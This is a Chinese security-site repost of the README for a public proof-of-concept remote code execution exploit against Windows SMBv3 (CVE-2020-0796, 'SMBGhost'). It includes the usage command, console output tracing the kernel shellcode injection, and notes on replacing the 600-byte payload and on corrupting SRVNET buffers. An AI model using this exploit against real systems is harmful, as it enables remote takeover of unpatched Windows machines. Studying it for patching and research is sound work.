SMBGhost_RCE_PoC

华盟原创文章投稿奖励计划

自动草稿 

CVE-2020-0796“ SMBGhost”的RCE PoC

仅用于演示目的!仅将此用作参考。说真的 这尚未在我的实验室环境之外进行过测试。它写得很快,需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外,将其用于其他目的是一个非常糟糕的主意。

用法示例:

$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131[ ] found low stub at phys addr 13000![ ] PML4 at 1ad000
[ ] base of HAL heap at fffff79480000000
[ ] ntoskrnl entry at fffff80645792010
[ ] found PML4 self-ref entry 1eb
[ ] found HalpInterruptController at fffff79480001478
[ ] found HalpApicRequestInterrupt at fffff80645cb3bb0
[ ] built shellcode![ ] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[ ] KUSER_SHARED_DATA PTE NX bit cleared!
[ ] Wrote shellcode at fffff78000000a00!
[ ] Press a key to execute shellcode!
[ ] overwrote HalpInterruptController pointer, should have execution shortly...

替换exploit.py中USER_PAYLOAD中的有效负载。最多600个字节。如果需要更多,请自己修改内核外壳代码。

lznt1代码从这里开始。修改以添加“不良压缩”功能以破坏SRVNET缓冲区标头而不会导致崩溃。

文章来源:https://github.com/chompie1337/SMBGhost_RCE_PoC

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/download/259809.html

发表评论